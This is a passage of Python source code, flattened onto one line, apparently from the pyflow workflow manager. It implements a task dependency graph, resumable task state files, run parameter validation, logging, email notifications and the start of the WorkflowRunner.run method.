p.isIgnoreThis : continue if not p.isComplete() : retval = False break return retval def _isDeadWalker(self, searched) : "recursive helper function for isDead()" # the fact that you're still searching means that it must have returned False last time: if self in searched : return False searched.add(self) if self.isError() : return True if self.isComplete() : return False for p in self.parents : if p._isDeadWalker(searched) : return True return False @lockMethod def isDead(self) : """ If true, there's no longer a point to waiting for this task, because it either has an error or there is an error in an upstream dependency """ # searched is used to restrict the complexity of this # operation on large graphs: searched = set() return self._isDeadWalker(searched) @lockMethod def setRunstate(self, runstate, updateTimeStamp=None) : """ updateTimeStamp is only supplied in the case where the state transition time is interestingly different than the function call time. This can happen with the state update comes from a polling function with a long poll interval. """ if runstate not in TaskNodeConstants.validRunstates : raise Exception("Can't set TaskNode runstate to %s" % (runstate)) if updateTimeStamp is None : self.runstateUpdateTimeStamp = time.time() else : self.runstateUpdateTimeStamp = updateTimeStamp self.runstate = runstate self.isWriteTaskStatus.set() @lockMethod def getTaskErrorMsg(self) : """ generate consistent task error message from task state """ if not self.isError() : return [] msg = "Failed to complete %s: '%s' launched from %s" % (self.payload.desc(), self.fullLabel(), namespaceLabel(self.namespace)) if self.payload.type() == "command" : msg += ", error code: %s, command: '%s'" % (str(self.errorstate), str(self.payload.launchCmd)) elif self.payload.type() == "workflow" : msg += ", failed sub-workflow classname: '%s'" % (self.payload.name()) else : assert 0 msg = lister(msg) if self.errorMessage != "" : msg2 = ["Error Message:"] msg2.extend(lister(self.errorMessage)) linePrefix = "[%s] " % (self.fullLabel()) for i in range(len(msg2)) : msg2[i] = linePrefix + msg2[i] msg.extend(msg2) return msg class TaskDAG(object) : """ Holds all tasks and their dependencies. Also responsible for task state persistence/continue across interrupted runs. Object is accessed by both the workflow and taskrunner threads, so it needs to be thread-safe. """ def __init__(self, isContinue, isForceContinue, isDryRun, taskInfoFile, taskStateFile, workflowClassName, startFromTasks, ignoreTasksAfter, resetTasks, flowLog) : """ No other object/thread gets to access the taskStateFile, so file locks are not required (but thread locks are) """ # If isConintue is true, this is a run which is continuing from a previous interrupted state. self.isContinue = isContinue self.isForceContinue = isForceContinue self.isDryRun = isDryRun self.taskInfoFile = taskInfoFile self.taskStateFile = taskStateFile self.workflowClassName = workflowClassName self.startFromTasks = startFromTasks self.ignoreTasksAfter = ignoreTasksAfter self.resetTasks = resetTasks self.flowLog = flowLog # unique id for each task in each run -- not persistent across continued runs: self.taskId = 0 # as tasks are added, occasionally spool task info to disk, and record the last # task index written + 1 self.lastTaskIdWritten = 0 # it will be easier for people to read the task status file if # the tasks are in approximately the same order as they were # added by the workflow: self.addOrder = [] self.labelMap = {} self.headNodes = set() self.tailNodes = set() self.lock = threading.RLock() # this event can be used to optionally accelerate the task cycle # when running in modes where task can set this event on completion # (ie. local mode but not sge), if this isn't set the normal polling # cycle applies self.isFinishedEvent = threading.Event() self.isWriteTaskInfo = None self.isWriteTaskStatus = None @lockMethod def isTaskPresent(self, namespace, label) : return ((namespace, label) in self.labelMap) @lockMethod def getTask(self, namespace, label) : if (namespace, label) in self.labelMap : return self.labelMap[(namespace, label)] return None @lockMethod def getHeadNodes(self) : "all tasks with no parents" return list(self.headNodes) @lockMethod def getTailNodes(self) : "all tasks with no (runnable) children" return list(self.tailNodes) @lockMethod def getAllNodes(self, namespace="") : "get all nodes in this namespace" retval = [] for (taskNamespace, taskLabel) in self.addOrder : if namespace != taskNamespace : continue node=self.labelMap[(taskNamespace, taskLabel)] if node.isIgnoreThis : continue retval.append(node) return retval @lockMethod def cancelTask(self, task) : # Nothing to do if task is already done if task.isDone() : return # Nothing to do if task is already ignored if task.isIgnoreThis : return # Can't cancel a task with uncanceled children: for child in task.children : assert(child.isIgnoreThis) task.runstate = "waiting" task.isIgnoreThis = True if task in self.tailNodes : self.tailNodes.remove(task) for parent in task.parents : isTailNode = True for child in parent.children : if not child.isIgnoreThis : isTailNode = False break if isTailNode : self.tailNodes.add(parent) def _isRunExhaustedNode(self, node, searched) : # the fact that you're still searching means that it must have returned true last time: if node in searched : return True searched.add(node) if not node.isIgnoreThis : if not node.isDone() : return False if node.isComplete() : for c in node.children : if not self._isRunExhaustedNode(c, searched) : return False return True @lockMethod def isRunExhausted(self) : """ Returns true if the run is as complete as possible due to errors """ # searched is used to restrict the complexity of this # operation on large graphs: searched = set() for node in self.getHeadNodes() : if not self._isRunExhaustedNode(node,searched) : return False return True @lockMethod def isRunComplete(self) : "returns true if run is complete and error free" for node in list(self.labelMap.values()): if node.isIgnoreThis : continue if not node.isComplete() : return False return True def _getReadyTasksFromNode(self, node, ready, searched) : "helper function for getReadyTasks" if node.isIgnoreThis : return if node in searched : return searched.add(node) if node.isReady() : ready.add(node) else: if not node.isComplete() : for c in node.parents : self._getReadyTasksFromNode(c, ready, searched) @lockMethod def getReadyTasks(self) : """ Go through DAG from the tail nodes and find all tasks which have all prerequisites completed: """ completed = self.markCheckPointsComplete() ready = set() # searched is used to restrict the complexity of this # operation on large graphs: searched = set() for node in self.getTailNodes() : self._getReadyTasksFromNode(node, ready, searched) return (list(ready), list(completed)) def _markCheckPointsCompleteFromNode(self, node, completed, searched) : "helper function for markCheckPointsComplete" if node.isIgnoreThis : return if node in searched : return searched.add(node) if node.isComplete() : return for c in node.parents : self._markCheckPointsCompleteFromNode(c, completed, searched) def isCheckpointTask(task) : return (task.payload.type() == "command") and (task.payload.cmd.cmd is None) if node.isReady() and isCheckpointTask(node) : node.setRunstate("complete") completed.add(node) @lockMethod def markCheckPointsComplete(self) : """ Traverse from tail nodes up, marking any checkpoint tasks that are ready as complete, return set of newly completed tasks: """ completed = set() # 'searched' set is used to restrict the complexity of this # operation on large graphs: searched = set() for node in self.getTailNodes() : self._markCheckPointsCompleteFromNode(node, completed, searched) return completed @lockMethod def addTask(self, namespace, label, payload, dependencies, isContinued=False) : """ Add new task to the task DAG @param isContinued If true, the task is being read from state history while resuming an interrupted run """ # We should not expect to see isContinued task input unless this is a continued workflow: assert(not (isContinued and (not self.isContinue))) # internal data structures use the task namespace and label separately, but for logging we # create one string: fullLabel = namespaceJoin(namespace, label) # first check to see if task exists in DAG already, this is not allowed unless # we are continuing a previous run, in which case it's allowed once: if not isContinued and self.isTaskPresent(namespace, label): if self.isContinue and self.labelMap[(namespace, label)].isContinued: # confirm that task is a match, flip off the isContinued flag and return: task = self.labelMap[(namespace, label)] parentLabels = set([p.label for p in task.parents]) excPrefix = "Task: '%s' does not match previous definition defined in '%s'." % (fullLabel, self.taskInfoFile) if task.payload.type() != payload.type() : msg = excPrefix + " New/old payload type: '%s'/'%s'" % (payload.type(), task.payload.type()) raise Exception(msg) if payload.isTaskStable : if (payload.type() == "command") and (str(task.payload.cmd) != str(payload.cmd)) : msg = excPrefix + " New/old command: '%s'/'%s'" % (str(payload.cmd), str(task.payload.cmd)) if self.isForceContinue : self.flowLog(msg,logState=LogState.WARNING) else : raise Exception(msg) if (parentLabels != set(dependencies)) : msg = excPrefix + " New/old dependencies: '%s'/'%s'" % (",".join(dependencies), ",".join(parentLabels)) if self.isForceContinue : self.flowLog(msg,logState=LogState.WARNING) else : raise Exception(msg) if payload.type() == "command" : task.payload.cmd = payload.cmd task.payload.isCmdMakePath = payload.isCmdMakePath # Deal with resuming ephemeral tasks if payload.isTaskEphemeral : def doesTaskHaveFinishedChildren(task) : # Check for completed children (completed children, but not incomplete children, must have been # entered by this point in a continued run: for child in task.children : if child.isComplete() : return True return False if not doesTaskHaveFinishedChildren(task) : if payload.type() == "workflow" : # workflow logic is not recorded in the state file, so on continuation it needs to be added back in: task.payload.workflow = payload.workflow task.setRunstate("waiting") task.payload.isTaskEphemeral = True task.isContinued = False return else: raise Exception("Task: '%s' is already in TaskDAG" % (fullLabel)) task = TaskNode(self.lock, self.taskId, namespace, label, payload, isContinued, self.isFinishedEvent, self.isWriteTaskStatus) self.taskId += 1 self.addOrder.append((namespace, label)) self.labelMap[(namespace, label)] = task for d in dependencies : parent = self.getTask(namespace, d) if parent is task : raise Exception("Task: '%s' cannot specify its own task label as a dependency" % (fullLabel)) if parent is None : raise Exception("Dependency: '%s' for task: '%s' does not exist in TaskDAG" % (namespaceJoin(namespace, d), fullLabel)) task.parents.add(parent) parent.children.add(task) if isContinued : isReset=False if label in self.resetTasks : isReset=True else : for p in task.parents : if p.isReset : isReset = True break if isReset : task.setRunstate("waiting") task.isReset=True if not isContinued: self.isWriteTaskInfo.set() self.isWriteTaskStatus.set() # determine if this is an ignoreTasksAfter node if label in self.ignoreTasksAfter : task.isIgnoreChildren = True # determine if this is an ignoreTasksAfter descendant for p in task.parents : if p.isIgnoreChildren : task.isIgnoreThis = True task.isIgnoreChildren = True break # update headNodes if len(task.parents) == 0 : self.headNodes.add(task) # update isAutoCompleted: if (self.startFromTasks and (label not in self.startFromTasks)) : task.isAutoCompleted = True for p in task.parents : if not p.isAutoCompleted : task.isAutoCompleted = False break # in case of no-parents, also check sub-workflow node if task.isAutoCompleted and (len(task.parents) == 0) and (namespace != ""): wval=namespace.rsplit(namespaceSep,1) if len(wval) == 2 : (workflowNamespace,workflowLabel)=wval else : workflowNamespace="" workflowLabel=wval[0] workflowParent = self.labelMap[(workflowNamespace, workflowLabel)] if not workflowParent.isAutoCompleted : task.isAutoCompleted = False if task.isAutoCompleted : task.setRunstate("complete") # update tailNodes: if not task.isIgnoreThis : self.tailNodes.add(task) for p in task.parents : if p in self.tailNodes : self.tailNodes.remove(p) # check dependency runState consistency: if task.isDone() : for p in task.parents : if p.isIgnoreThis : continue if p.isComplete() : continue raise Exception("Task: '%s' has invalid continuation state. Task dependencies are incomplete") @lockMethod def writeTaskStatus(self) : """ Update the runstate and errorstate for all tasks. This is intended to be atomic, but can only be made so on unix. """ # don't write task status during dry runs: if self.isDryRun : return tmpFile = self.taskStateFile + ".update.incomplete" tmpFp = open(tmpFile, "w") tmpFp.write(taskStateHeader()) for (namespace, label) in self.addOrder : task = self.labelMap[(namespace, label)] runstateUpdateTimeStr = timeStampToTimeStr(task.runstateUpdateTimeStamp) tmpFp.write("%s\t%s\t%s\t%i\t%s\n" % (label, namespace, task.runstate, task.errorstate, runstateUpdateTimeStr)) tmpFp.close() forceRename(tmpFile, self.taskStateFile) @lockMethod def getTaskStatus(self) : """ Enumerate status of command tasks (but look at sub-workflows to determine if specification is complete) """ val = Bunch(waiting=0, queued=0, running=0, complete=0, error=0, isAllSpecComplete=True, longestQueueSec=0, longestRunSec=0, longestQueueName="", longestRunName="") currentSec = time.time() for (namespace, label) in self.addOrder : node = self.labelMap[(namespace, label)] # special check just for workflow tasks: if node.payload.type() == "workflow" : if not node.runStatus.isSpecificationComplete.isSet() : val.isAllSpecComplete = False # the rest of this enumeration is for command tasks only: continue taskTime = int(currentSec - node.runstateUpdateTimeStamp) if node.runstate == "waiting" : val.waiting += 1 elif node.runstate == "queued" : val.queued += 1 if val.longestQueueSec < taskTime : val.longestQueueSec = taskTime val.longestQueueName = node.fullLabel() elif node.runstate == "running" : val.running += 1 if val.longestRunSec < taskTime : val.longestRunSec = taskTime val.longestRunName = node.fullLabel() elif node.runstate == "complete" : val.complete += 1 elif node.runstate == "error" : val.error += 1 return val @lockMethod def writeTaskInfo(self) : """ appends a description of all new tasks to the taskInfo file """ def getTaskLineFromTask(task) : """ Create a single-line summary of the input task for use in the taskInfo file """ depstring = "" if len(task.parents) : depstring = ",".join([p.label for p in task.parents]) cmdstring = "" nCores = "0" memMb = "0" priority = "0" isForceLocal = "0" payload = task.payload cwdstring = "" if payload.type() == "command" : cmdstring = str(payload.cmd) nCores = str(payload.nCores) memMb = str(payload.memMb) priority = str(payload.priority) isForceLocal = boolToStr(payload.isForceLocal) cwdstring = payload.cmd.cwd elif payload.type() == "workflow" : cmdstring = payload.name() else : assert 0 return "\t".join((task.label, task.namespace, payload.type(), nCores, memMb, priority, isForceLocal, depstring, cwdstring, cmdstring)) assert (self.lastTaskIdWritten <= self.taskId) if self.lastTaskIdWritten == self.taskId : return newTaskLines = [] while self.lastTaskIdWritten < self.taskId : task = self.labelMap[self.addOrder[self.lastTaskIdWritten]] newTaskLines.append(getTaskLineFromTask(task)) self.lastTaskIdWritten += 1 fp = open(self.taskInfoFile, "a") for taskLine in newTaskLines : fp.write(taskLine + "\n") fp.close() def _createContinuedStateFile(self, taskStateFile) : """ Update task state file for a 'continued' run, meaning a run which is being resumed after interrupt. In this scenario, the existing task state file is read in but only tasks which are complete retain status, and any other state (running, queued, etc.) is lost, reflecting the atomic nature of these tasks -- having not completed they must be completely restarted. The filtered task output is written to a new task file and swapped in to replace the old task state file. The function returns the set of full names for complete tasks """ if not os.path.isfile(taskStateFile) : return set() tmpFile = taskStateFile + ".update.incomplete" tmpfp = open(tmpFile, "w") tmpfp.write(taskStateHeader()) complete = set() for words in taskStateParser(taskStateFile) : (runState, errorCode) = words[2:4] if (runState != "complete") or (int(errorCode) != 0) : continue tmpfp.write("\t".join(words) + "\n") (label, namespace) = words[0:2] complete.add(namespaceJoin(namespace, label)) tmpfp.close() forceRename(tmpFile, taskStateFile) return complete def _createContinuedInfoFile(self, taskInfoFile, complete) : """ Initialize TaskDAG to include placeholders of all tasks which have already been completed. Also update task info file to only retain completed tasks. Placeholder tasks are used to check that the underlying task definitions have not unexpectedly changed over the interrupt/resume cycle. Update the task info file when a run is attempting to continue from where it left off after interruption. @param complete: Fullnames of all completed tasks """ if not os.path.isfile(taskInfoFile) : return tmpFile = taskInfoFile + ".update.incomplete" tmpfp = open(tmpFile, "w") tmpfp.write(taskInfoHeader()) for words in taskInfoParser(taskInfoFile) : (label, namespace, ptype, nCores, memMb, priority, isForceLocal, depStr, cwdStr, command) = words fullLabel = namespaceJoin(namespace, label) if fullLabel not in complete : continue tmpfp.write("\t".join(words) + "\n") self.lastTaskIdWritten += 1 if ptype == "command" : if command == "" : command = None payload = CmdPayload(fullLabel, Command(command, cwdStr), int(nCores), int(memMb), int(priority), argToBool(isForceLocal)) elif ptype == "workflow" : payload = WorkflowPayload(None) else : assert 0 self.addTask(namespace, label, payload, getTaskInfoDepSet(depStr), isContinued=True) tmpfp.close() forceRename(tmpFile, taskInfoFile) @lockMethod def setupContinuedWorkflow(self) : """ Take care of all continuation specific setup activities. Read previous task state files if they exist and initialize taskDAG to reflect all tasks which have already been completed. Update task state files to reflect completed tasks only. """ # Ensure that state file notifiers have been initialized as a precondition to this step, because # we create new tasks while reading the info file, and the state file notifiers are copied from # this object into the individual tasks. # assert(self.isWriteTaskInfo is not None) assert(self.isWriteTaskStatus is not None) complete = self._createContinuedStateFile(self.taskStateFile) self._createContinuedInfoFile(self.taskInfoFile, complete) # workflowRunner: # class DataDirException(Exception) : """ Special exception used for the case where pyflow data dir is already in use """ def __init__(self, msg) : Exception.__init__(self) self.msg = msg class WorkflowRunnerThreadSharedData(object) : """ All data used by the WorkflowRunner which will be constant over the lifetime of a TaskManager instance. All of the information in this class will be accessed by both threads without locking. """ def __init__(self) : self.lock = threading.RLock() self.pid = os.getpid() self.runcount = 0 self.cwd = os.path.abspath(os.getcwd()) self.markFile = None # we potentially have to log before the logfile is setup (eg # an exception is thrown reading run parameters), so provide # an explicit notification that there's no log file: self.flowLogFp = None self.warningLogFp = None self.errorLogFp = None self.resetRun() # two elements required to implement a nohup-like behavior: self.isHangUp = threading.Event() self._isStderrAlive = True @staticmethod def _validateFixParam(param): """ validate and refine raw run() parameters for use by workflow """ param.mailTo = setzer(param.mailTo) param.schedulerArgList = lister(param.schedulerArgList) if param.successMsg is not None : if not isString(param.successMsg) : raise Exception("successMsg argument to WorkflowRunner.run() is not a string") # create combined task retry settings manager: param.retry=RetryParam(param.mode, param.retryMax, param.retryWait, param.retryWindow, param.retryMode) # setup resource parameters if param.nCores is None : param.nCores = RunMode.data[param.mode].defaultCores # ignore total available memory settings in non-local modes: if param.mode != "local" : param.memMb = "unlimited" if param.mode == "sge" : if siteConfig.maxSGEJobs != "unlimited" : if ((param.nCores == "unlimited") or (int(param.nCores) > int(siteConfig.maxSGEJobs))) : param.nCores = int(siteConfig.maxSGEJobs) if param.nCores != "unlimited" : param.nCores = int(param.nCores) if param.nCores < 1 : raise Exception("Invalid run mode nCores argument: %s. Value must be 'unlimited' or an integer no less than 1" % (param.nCores)) if param.memMb is None : if param.nCores == "unlimited" : param.memMb = "unlimited" mpc = RunMode.data[param.mode].defaultMemMbPerCore if mpc == "unlimited" : param.memMb = "unlimited" else : param.memMb = mpc * param.nCores elif param.memMb != "unlimited" : param.memMb = int(param.memMb) if param.memMb < 1 : raise Exception("Invalid run mode memMb argument: %s. Value must be 'unlimited' or an integer no less than 1" % (param.memMb)) # verify/normalize input settings: if param.mode not in list(RunMode.data.keys()) : raise Exception("Invalid mode argument '%s'. Accepted modes are {%s}." \ % (param.mode, ",".join(list(RunMode.data.keys())))) if param.mode == "sge" : # TODO not-portable to windows (but is this a moot point -- all of sge mode is non-portable, no?): def checkSgeProg(prog) : proc = subprocess.Popen(("which", prog), stdout=open(os.devnull, "w"), shell=False) retval = proc.wait() if retval != 0 : raise Exception("Run mode is sge, but no %s in path" % (prog)) checkSgeProg("qsub") checkSgeProg("qstat") stateDir = os.path.join(param.dataDir, "state") if param.isContinue == "Auto" : param.isContinue = os.path.exists(stateDir) if param.isContinue : if not os.path.exists(stateDir) : raise Exception("Cannot continue run without providing a pyflow dataDir containing previous state.: '%s'" % (stateDir)) for email in param.mailTo : if not verifyEmailAddy(email): raise Exception("Invalid email address: '%s'" % (email)) def _setCustomLogs(self) : if (self.warningLogFp is None) and (self.param.warningLogFile is not None) : self.warningLogFp = open(self.param.warningLogFile,"w") if (self.errorLogFp is None) and (self.param.errorLogFile is not None) : self.errorLogFp = open(self.param.errorLogFile,"w") def setupNewRun(self, param) : self.param = param # setup log file-handle first, then run the rest of parameter validation: # (hold this file open so that we can still log if pyflow runs out of filehandles) self.param.dataDir = os.path.abspath(self.param.dataDir) self.param.dataDir = os.path.join(self.param.dataDir, "pyflow.data") logDir = os.path.join(self.param.dataDir, "logs") ensureDir(logDir) self.flowLogFile = os.path.join(logDir, "pyflow_log.txt") self.flowLogFp = open(self.flowLogFile, "a") # run remaining validation self._validateFixParam(self.param) # initial per-run data self.taskErrors = set() # this set actually contains every task that failed -- tasks contain all of their own error info self.isTaskManagerException = False # create data directory if it does not exist ensureDir(self.param.dataDir) # check whether a process already exists: self.markFile = os.path.join(self.param.dataDir, "active_pyflow_process.txt") if os.path.exists(self.markFile) : # Non-conventional logging situation -- another pyflow process is possibly using this same data directory, so we want # to log to stderr (even if the user has set isQuiet) and not interfere with the other process's log self.flowLogFp = None self.param.isQuiet = False msg = [ "Can't initialize pyflow run because the data directory appears to be in use by another process.", "\tData directory: '%s'" % (self.param.dataDir), "\tIt is possible that a previous process was abruptly interrupted and did not clean up properly. To determine if this is", "\tthe case, please refer to the file '%s'" % (self.markFile), "\tIf this file refers to a non-running process, delete the file and relaunch pyflow,", "\totherwise, specify a new data directory. At the API-level this can be done with the dataDirRoot option." ] self.markFile = None # this keeps pyflow from deleting this file, as it normally would on exit raise DataDirException(msg) else : mfp = open(self.markFile, "w") msg = """ This file provides details of the pyflow instance currently using this data directory. During normal pyflow run termination (due to job completion, error, SIGINT, etc...), this file should be deleted. If this file is present it should mean either: (1) the data directory is still in use by a running workflow (2) a sudden job failure occurred that prevented normal run termination The associated pyflow job details are as follows: """ mfp.write(msg + "\n") for line in self.getInfoMsg() : mfp.write(line + "\n") mfp.write("\n") mfp.close() stateDir = os.path.join(self.param.dataDir, "state") ensureDir(stateDir) # setup other instance data: self.runcount += 1 # initialize directories self.wrapperLogDir = os.path.join(logDir, "tmp", "taskWrapperLogs") ensureDir(self.wrapperLogDir) stackDumpLogDir = os.path.join(logDir, "tmp", "stackDumpLog") ensureDir(stackDumpLogDir) # initialize filenames: taskStateFileName = "pyflow_tasks_runstate.txt" taskInfoFileName = "pyflow_tasks_info.txt" self.taskStdoutFile = os.path.join(logDir, "pyflow_tasks_stdout_log.txt") self.taskStderrFile = os.path.join(logDir, "pyflow_tasks_stderr_log.txt") self.taskStateFile = os.path.join(stateDir, taskStateFileName) self.taskInfoFile = os.path.join(stateDir, taskInfoFileName) self.taskDotScriptFile = os.path.join(stateDir, "make_pyflow_task_graph.py") self.stackDumpLogFile = os.path.join(stackDumpLogDir, "pyflow_stack_dump.txt") # empty file: if not self.param.isContinue: fp = open(self.taskInfoFile, "w") fp.write(taskInfoHeader()) fp.close() self._setCustomLogs() # finally write dot task graph creation script: # # this could fail because of script permission settings, buk it is not critical for # workflow completion so we get away with a warning try : writeDotScript(self.taskDotScriptFile, taskInfoFileName, taskStateFileName, self.param.workflowClassName) except OSError: msg = ["Failed to write task graph visualization script to %s" % (self.taskDotScriptFile)] self.flowLog(msg,logState=LogState.WARNING) def resetRun(self) : """ Anything that needs to be cleaned up at the end of a run Right now this just make sure we don't log to the previous run's log file """ self.flowLogFile = None self.param = None if self.flowLogFp is not None : self.flowLogFp.close() self.flowLogFp = None if self.warningLogFp is not None : self.warningLogFp.close() self.warningLogFp = None if self.errorLogFp is not None : self.errorLogFp.close() self.errorLogFp = None if self.markFile is not None : if os.path.exists(self.markFile) : os.unlink(self.markFile) self.markFile = None def getRunid(self) : return "%s_%s" % (self.pid, self.runcount) @lockMethod def setTaskError(self, task) : self.taskErrors.add(task) @lockMethod def isTaskError(self) : return (len(self.taskErrors) != 0) def isTaskSubmissionActive(self) : """ wait() pollers need to know if task submission has been shutdown to implement sane behavior. """ return (not self.isTaskError()) @lockMethod def setTaskManagerException(self) : self.isTaskManagerException = True @lockMethod def flowLog(self, msg, linePrefix=None, logState = LogState.INFO) : linePrefixOut = "[%s]" % (self.getRunid()) if linePrefix is not None : linePrefixOut += " " + linePrefix if (logState == LogState.ERROR) or (logState == LogState.WARNING) : linePrefixOut += " [" + LogState.toString(logState) + "]" ofpList = [] isAddStderr = (self._isStderrAlive and ((self.flowLogFp is None) or (self.param is None) or (not self.param.isQuiet))) if isAddStderr: ofpList.append(sys.stderr) if self.flowLogFp is not None : ofpList.append(self.flowLogFp) # make a last ditch effort to open the special error logs if these are not available already: try : self._setCustomLogs() except : pass if (self.warningLogFp is not None) and (logState == LogState.WARNING) : ofpList.append(self.warningLogFp) if (self.errorLogFp is not None) and (logState == LogState.ERROR) : ofpList.append(self.errorLogFp) if len(ofpList) == 0 : return retval = log(ofpList, msg, linePrefixOut) # check if stderr stream failed. If so, turn it off for the remainder of run (assume terminal hup): if isAddStderr and (not retval[0]) : if self.isHangUp.isSet() : self._isStderrAlive = False def getInfoMsg(self) : """ return a string array with general stats about this run """ msg = [ "%s\t%s" % ("pyFlowClientWorkflowClass:", self.param.workflowClassName), "%s\t%s" % ("pyFlowVersion:", __version__), "%s\t%s" % ("pythonVersion:", pythonVersion), "%s\t%s" % ("Runid:", self.getRunid()), "%s\t%s UTC" % ("RunStartTime:", self.param.logRunStartTime), "%s\t%s UTC" % ("NotificationTime:", timeStrNow()), "%s\t%s" % ("HostName:", siteConfig.getHostName()), "%s\t%s" % ("WorkingDir:", self.cwd), "%s\t%s" % ("DataDir:", self.param.dataDir), "%s\t'%s'" % ("ProcessCmdLine:", cmdline()) ] return msg def emailNotification(self, msgList, emailErrorLog=None) : # # email addy might not be setup yet: # # if errorLog is specified, then an email send exception will # be handled and logged, otherwise the exception will be re-raised # down to the caller. # if self.param is None : return if self.param.mailTo is None: return if len(self.param.mailTo) == 0 : return if not isLocalSmtp() : if emailErrorLog : msg = ["email notification failed, no local smtp server"] emailErrorLog(msg,logState=LogState.WARNING) return mailTo = sorted(list(self.param.mailTo)) subject = "pyflow notification from %s run: %s" % (self.param.workflowClassName, self.getRunid()) msg = msgListToMsg(msgList) fullMsgList = ["Message:", '"""', msg, '"""'] fullMsgList.extend(self.getInfoMsg()) import smtplib try: sendEmail(mailTo, siteConfig.mailFrom, subject, fullMsgList) except smtplib.SMTPException : if emailErrorLog is None : raise msg = ["email notification failed"] eMsg = lister(getExceptionMsg()) msg.extend(eMsg) emailErrorLog(msg,logState=LogState.WARNING) class WorkflowRunner(object) : """ This object is designed to be inherited by a class in client code. This inheriting class can override the L{workflow()<WorkflowRunner.workflow>} method to define the tasks that need to be run and their dependencies. The inheriting class defining a workflow can be executed in client code by calling the WorkflowRunner.run() method. This method provides various run options such as whether to run locally or on sge. """ _maxWorkflowRecursion = 30 """ This limit protects against a runaway forkbomb in case a workflow task recursively adds itself w/o termination: """ def run(self, mode="local", dataDirRoot=".", isContinue=False, isForceContinue=False, nCores=None, memMb=None, isDryRun=False, retryMax=2, retryWait=90, retryWindow=360, retryMode="nonlocal", mailTo=None, updateInterval=60, schedulerArgList=None, isQuiet=False, warningLogFile=None, errorLogFile=None, successMsg=None, startFromTasks=None, ignoreTasksAfter=None, resetTasks=None) : """ Call this method to execute the workflow() method overridden in a child class and specify the resources available for the workflow to run. Task retry behavior: Retry attempts will be made per the arguments below for distributed workflow runs (eg. sge run mode). Note this means that retries will be attempted for tasks with an 'isForceLocal' setting during distributed runs. Task error behavior: When a task error occurs the task manager stops submitting new tasks and allows all currently running tasks to complete. Note that in this case 'task error' means that the task could not be completed after exhausting attempted retries. Workflow exception behavior: Any exceptions thrown from the python code of classes derived from WorkflowRunner will be logged and trigger notification (e.g. email). The exception will not come down to the client's stack. In sub-workflows the exception is handled exactly like a task error (ie. task submission is shut-down and remaining tasks are allowed to complete). An exception in the master workflow will lead to workflow termination without waiting for currently running tasks to finish. @return: 0 if all tasks completed successfully and 1 otherwise @param mode: Workflow run mode. Current options are (local|sge) @param dataDirRoot: All workflow data is written to {dataDirRoot}/pyflow.data/ These include workflow/task logs, persistent task state data, and summary run info. Two workflows cannot simultaneously use the same dataDir. @param isContinue: If True, continue workflow from a previous incomplete run based on the workflow data files. You must use the same dataDirRoot as a previous run for this to work. Set to 'Auto' to have the run continue only if the previous dataDir exists. (default: False) @param isForceContinue: Only used if isContinue is not False. Normally when isContinue is run, the commands of completed tasks are checked to ensure they match. When isForceContinue is true, failing this check is reduced from an error to a warning @param nCores: Total number of cores available, or 'unlimited', sge is currently configured for a maximum job count of %s, any value higher than this in sge mode will be reduced to the maximum. (default: 1 for local mode, %s for sge mode) @param memMb: Total memory available (in megabytes), or 'unlimited', Note that this value will be ignored in non-local modes (such as sge), because in this case total memory available is expected to be known by the scheduler for each node in its cluster. (default: %i*nCores for local mode, 'unlimited' for sge mode) @param isDryRun: List the commands to be executed without running them. Note that recursive and dynamic workflows will potentially have to account for the fact that expected files will be missing -- here 'recursive workflow' refers to any workflow which uses the addWorkflowTask() method, and 'dynamic workflow' refers to any workflow which uses the waitForTasks() method. These types of workflows can query this status with the isDryRun() to make accomadations. (default: False) @param retryMax: Maximum number of task retries @param retryWait: Delay (in seconds) before resubmitting task @param retryWindow: Maximum time (in seconds) after the first task submission in which retries are allowed. A value of zero or less puts no limit on the time when retries will be attempted. Retries are always allowed (up to retryMax times), for failed make jobs. @param retryMode: Modes are 'nonlocal' and 'all'. For 'nonlocal' retries are not attempted in local run mode. For 'all' retries are attempted for any run mode. The default mode is 'nonolocal'. @param mailTo: An email address or container of email addresses. Notification will be sent to each email address when either (1) the run successfully completes (2) the first task error occurs or (3) an unhandled exception is raised. The intention is to send one status message per run() indicating either success or the reason for failure. This should occur for all cases except a host hardware/power failure. Note that mail comes from '%s' (configurable), which may be classified as junk-mail by your system. @param updateInterval: How often (in minutes) should pyflow log a status update message summarizing the run status. Set this to zero or less to turn the update off. @param schedulerArgList: A list of arguments can be specified to be passed on to an external scheduler when non-local modes are used (e.g. in sge mode you could pass schedulerArgList=['-q','work.q'] to put the whole pyflow job into the sge work.q queue) @param isQuiet: Don't write any logging output to stderr (but still write log to pyflow_log.txt) @param warningLogFile: Replicate all warning messages to the specified file. Warning messages will still appear in the standard logs, this file will contain a subset of the log messages pertaining to warnings only. @param errorLogFile: Replicate all error messages to the specified file. Error messages will still appear in the standard logs, this file will contain a subset of the log messages pertaining to errors only. It should be empty for a successful run. @param successMsg: Provide a string containing a custom message which will be prepended to pyflow's standard success notification. This message will appear in the log and any configured notifications (e.g. email). The message may contain linebreaks. @param startFromTasks: A task label or container of task labels. Any tasks which are not in this set or descendants of this set will be marked as completed. @type startFromTasks: A single string, or set, tuple or list of strings @param ignoreTasksAfter: A task label or container of task labels. All descendants of these task labels will be ignored. @type ignoreTasksAfter: A single string, or set, tuple or list of strings @param resetTasks: A task label or container of task labels. These tasks and all of their descendants will be reset to the "waiting" state to be re-run. Note this option will only affect a workflow which has been continued from a previous run. This will not override any nodes altered by the startFromTasks setting in the case that both options are used together. @type resetTasks: A single string, or set, tuple or list of strings """ # Setup pyflow signal handlers: # inHandlers = Bunch(isSet=False) class SigTermException(Exception) : pass def sigtermHandler(_signum, _frame) : raise SigTermException def sighupHandler(_signum, _frame) : self._warningLog("pyflow recieved hangup signal. pyflow will continue, but this signal may still interrupt running tasks.") # tell cdata to turn off any tty writes: self._cdata().isHangUp.set() def set_pyflow_sig_handlers() : import signal if not inHandlers.isSet : inHandlers.sigterm = signal.getsignal(signal.SIGTERM) if not isWindows() : inHandlers.sighup = signal.getsignal(signal.SIGHUP) inHandlers.isSet = True try: signal.signal(signal.SIGTERM, sigtermHandler) if not isWindows() : signal.signal(signal.SIGHUP, sighupHandler) except ValueError: if isMainThread() : raise else : self._warningLog("pyflow has not been initialized on main thread, all custom signal handling disabled") def unset_pyflow_sig_handlers() : import signal if not inHandlers.isSet : return try : signal.signal(signal.SIGTERM, inHandlers.sigterm) if not isWindows() : signal.signal(signal.SIGHUP, inHandlers.sighup) except ValueError: if isMainThread() : raise else: pass # if return value is somehow not set after this then something bad happened, so init to 1: retval = 1 try: set_pyflow_sig_handlers() def exceptionMessaging(prefixMsg=None) : msg = lister(prefixMsg) eMsg = 